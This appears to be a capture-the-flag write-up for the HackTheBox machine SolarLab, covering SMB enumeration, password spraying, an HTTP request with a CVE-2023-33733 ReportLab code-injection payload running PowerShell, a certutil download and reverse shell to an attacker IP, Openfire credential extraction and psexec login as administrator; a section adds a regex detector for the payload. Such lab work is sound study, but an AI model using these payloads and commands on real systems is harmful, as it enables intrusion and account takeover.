HTB-M-SolarLab

  1. Fuzzy guessing of account names
  2. Reproducing the ReportLab CVE
  3. Extracting the account password from the Openfire script

Scan

Probe SMB

It can be used for RID brute-forcing

```bash
netexec smb 10.10.11.16 -u guest -p '' --rid-brute
```

Then:

Download the xlsx file

```bash
netexec smb solarlab.htb -u u.txt -p p.txt
```

Test

Then analyse

Deduce the account

  • blakeb:ThisCanB3typedeasily1@

After logging in, the leave-request form generates a PDF; take a look at what gets generated.

Searching for ReportLab turns up CVE-2023-33733

https://github.com/c53elyas/CVE-2023-33733/tree/master/code-injection-poc

Earlier enumeration showed this is a Windows box, so it is enough to swap the cookie and the payload in the request below 👇

```http
POST /travelApprovalForm HTTP/1.1
Host: report.solarlab.htb:6791
Content-Length: 2352
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://report.solarlab.htb:6791
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAV0OLYExkJA9aQBD
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://report.solarlab.htb:6791/travelApprovalForm
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: session=.eJwlzjEOwzAIQNG7eO6AMWCSy0TYgNrVaaaqd2-krn_4ep9y5IrzWfb3uuJRjpeXvWDOHg2yq5s7NNbNqNuksF5RqhCYskSISAuoxA3gDjpy-KYcc7RqW-1pg6cPYk3MRoDzHtJIlB6oShpmJonMYSToiiKjZrkh1xnrr6nl-wPM4y-d.aCdMeQ.XCcCuIOlqBK0IEiT04vFotZ8Bx0
Connection: close

------WebKitFormBoundaryAV0OLYExkJA9aQBD
Content-Disposition: form-data; name="time_interval"

2024-05-18 to 2024-05-25
------WebKitFormBoundaryAV0OLYExkJA9aQBD
Content-Disposition: form-data; name="travel_request"

<font color="[[[getattr(pow, Word('__globals__'))['os'].system('cmd /c powershell -e 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') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">exploit</font>
------WebKitFormBoundaryAV0OLYExkJA9aQBD
Content-Disposition: form-data; name="signature"; filename="nyan.png"
Content-Type: image/png

PNG
<--- CUT FOR BREVITY --->
------WebKitFormBoundaryAV0OLYExkJA9aQBD
Content-Disposition: form-data; name="user_input"

<p>asdf</p>
------WebKitFormBoundaryAV0OLYExkJA9aQBD--
```
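From the defensive side, the payload above has a shape that never appears in a legitimate travel-request field: Python list comprehensions inside a `color` attribute, `__globals__` reached through `getattr(pow, ...)`, and `type(type(1))`. The following detector is an added example (not from the original writeup or the CVE PoC repository) that scores submitted form fields against those indicators; the sample bodies are constructed, and the injection sample is a trimmed copy of the pattern with a harmless command.

```python
import re

# Constructed sample form-field values (not captured from the box). The last one
# mirrors the rl_safe_eval escape used by CVE-2023-33733, with a harmless command.
SAMPLE_BODIES = [
    "<p>Travel to Berlin, 3 nights.</p>",
    '<font color="red">Urgent</font> please approve',
    "<font color=\"[[[getattr(pow, Word('__globals__'))['os'].system('id') "
    "for Word in [ orgTypeFun('Word', (str,), {'mutated': 1}) ] ] "
    "for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'\">x</font>",
]

# Indicators that only make sense inside a ReportLab safe-eval escape. Each one
# alone could be a false positive; requiring several to co-occur keeps alerts sane.
PATTERNS = {
    "list_comp_in_color": re.compile(r'color\s*=\s*"?\s*\[\[\[', re.I),
    "globals_via_pow":    re.compile(r"getattr\s*\(\s*pow\s*,"),
    "dunder_globals":     re.compile(r"__globals__"),
    "type_of_type":       re.compile(r"type\s*\(\s*type\s*\("),
    "os_system":          re.compile(r"\[\s*['\"]os['\"]\s*\]\s*\.\s*system"),
}


def score_body(body: str) -> list[str]:
    """Return the names of every indicator that matches one form-field value."""
    return [name for name, rx in PATTERNS.items() if rx.search(body)]


def is_reportlab_injection(body: str, min_hits: int = 2) -> bool:
    """Flag a field when at least min_hits independent indicators co-occur."""
    return len(score_body(body)) >= min_hits


if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        print(is_reportlab_injection(body), score_body(body))
```

Run it against the `travel_request` and `user_input` fields at the proxy or in the Flask handler before the HTML reaches ReportLab; the ordinary markup in the first two samples scores zero.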


Shell 1 obtained

Information gathering

`net user` did not show the account here, but

Openfire is present

Search it up

Openfire is an open-source instant messaging (IM) server built on the XMPP protocol (Extensible Messaging and Presence Protocol).

The default port is 9090, and then:

Spray this account: build a wordlist from all the passwords, then run

```bash
netexec smb 10.10.11.16 -u 'openfire' -p p.txt
```

```bat
cmd.exe /c certutil.exe -urlcache -f -split http://10.10.16.5:80/RunasCs.exe C:\Users\blake\Downloads\runascs.exe
```

Use the credentials to pop a shell

```bat
C:\Users\blake\Downloads\runascs.exe openfire 'HotP!fireguard' cmd.exe -r 10.10.16.5:444 --bypass-uac -t 10
```

Then check the ACLs

```bat
cd Program Files
icacls Openfire
:: view the script file
C:\Program Files\Openfire\embedded-db>type openfire.script
```

Exploiting this needs two things: a key and a hex value

Decrypt it the same way

Lateral movement with psexec

```bash
rlwrap -cAr python3 /usr/share/doc/python3-impacket/examples/psexec.py administrator:'ThisPasswordShouldDo!@'@10.10.11.16 cmd.exe
```

References